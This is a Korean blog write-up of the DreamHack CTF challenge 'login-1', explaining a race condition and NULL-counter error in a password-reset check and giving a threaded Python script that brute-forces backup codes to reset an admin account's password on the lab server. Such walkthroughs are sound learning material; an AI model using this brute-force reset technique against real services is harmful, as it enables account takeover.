DreamHack - login-1 풀이

728x90

관리자 레벨 유저 아이디 찾기

http://host3.dreamhack.games:20947/user/1 <- 이곳에서 뒤에 숫자를 늘리면서 유저 정보 확인 가능

레이스 컨디션 취약점 코드

user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
    # security for brute force Attack.
    time.sleep(1)

    if user['resetCount'] == MAXRESETCOUNT:
        return "<script>alert('reset Count Exceed.');history.back(-1);</script>"

user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
ㄴ 유저의 정보(리셋카운트 포함)가 템플릿에 기록됨, *DB 결과의 복사본일 뿐 이곳 데이터가 바뀌어도 실제 DB는 안 바뀜

time.sleep(1)
ㄴ 무차별 대입 공격을 방지를 위한 딜레이, 딜레이에 빠지는 동안 동시에 여러 번의 수정 요청이 지연된다.

if user['resetCount'] == MAXRESETCOUNT:
ㄴ 그렇게 사용자의 resetCount가 동시다발적으로 증가하면서 결국 resetCount가 MAXRESETCOUNT를 훌쩍 넘어 이 조건문을 실행하지 않는다. 만약 user['resetCount'] >= MAXRESETCOUNT: 이렇게 작성했으면 이런 취약점은 없었을 것.

서버 에러 500을 이용

신규 계정을 만들게 되면 resetCount 영역에는 NULL이 생기게 되면서 아래의 resetCount = resetCount + 1 구문에서 오류가 발생한다. 결국 리셋 카운트는 증가 못한 채 서버 측 에러(500)가 발생한다.

    updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?"
    cur.execute(updateSQL, (str(user['idx'])))
    msg = f"Wrong BackupCode !<br/><b>Left Count : </b> {(MAXRESETCOUNT-1)-user['resetCount']}"

어드민 레벨 유저 아이디 중에서 potato에도 위와 같은 현상이 발생하게 되므로 resetCount에 신경을 쓰지 않고 마음껏 브루트 포스 공격이 가능하다.

파이썬 공격 코드

import requests
import threading

port = 8878

END_FLAG = False

def brute(userid, bmin, bmax):
    global END_FLAG
        
    url = f"http://host3.dreamhack.games:{port}/forgot_password"

    for i in range(bmin, bmax+1):
        
        if END_FLAG:
            return

        print(f"{userid}) Trying:", i)

        data = { 'userid': userid, 'newpassword': '1234', 'backupCode': str(i)}
        res = requests.post(url, data=data)

        if res.status_code == 500:
            continue

        if "Password Change Success." in res.text:
            print(f"{userid} Password Change Success! Login: {userid} | Password: 1234")
            END_FLAG = True
            break


t1 = threading.Thread(target=brute, args=("potato", 0, 50))
t1.start()

t2 = threading.Thread(target=brute, args=("potato", 51, 99))
t2.start()

레이스 컨디션과 서버 에러를 이용한 브루트 포스 공격 코드이다.

레이스 컨디션 공격 참고:

https://itstory.tk/entry/%EB%A0%88%EC%9D%B4%EC%8A%A4-%EC%BB%A8%EB%94%94%EC%85%98Race-Condition-%EA%B3%B5%EA%B2%A9

레이스 컨디션(Race Condition) 공격

레이스 컨디션 - 한정된 자원을 동시에 이용하려는 여러 프로세스가 자원의 이용을 위해 경쟁을 벌이는 현상 레이스 컨디션의 공격의 기본 - 1. 취약 프로그램이 생성하는 임시 파일의 이름을 파

itstory.tk

728x90

'🏴CTF > DreamHack' 카테고리의 다른 글

DreamHack - basic_exploitation_000 풀이 (0)	2023.04.26
DreamHack - basic_exploitation_001 풀이 (0)	2023.04.25
DreamHack - node-serialize (nodejs 직렬화 취약점) 풀이 (0)	2023.03.27
Dreamhack - 워게임, Mango 풀이 (0)	2021.12.09
Dreamhack - 워게임, rev-basic-2 풀이 (0)	2021.12.03

HackLog

DreamHack - login-1 풀이

'🏴CTF > DreamHack' 카테고리의 다른 글

티스토리툴바

DreamHack - login-1 풀이

'🏴CTF > DreamHack' 카테고리의 다른 글

관련글

티스토리툴바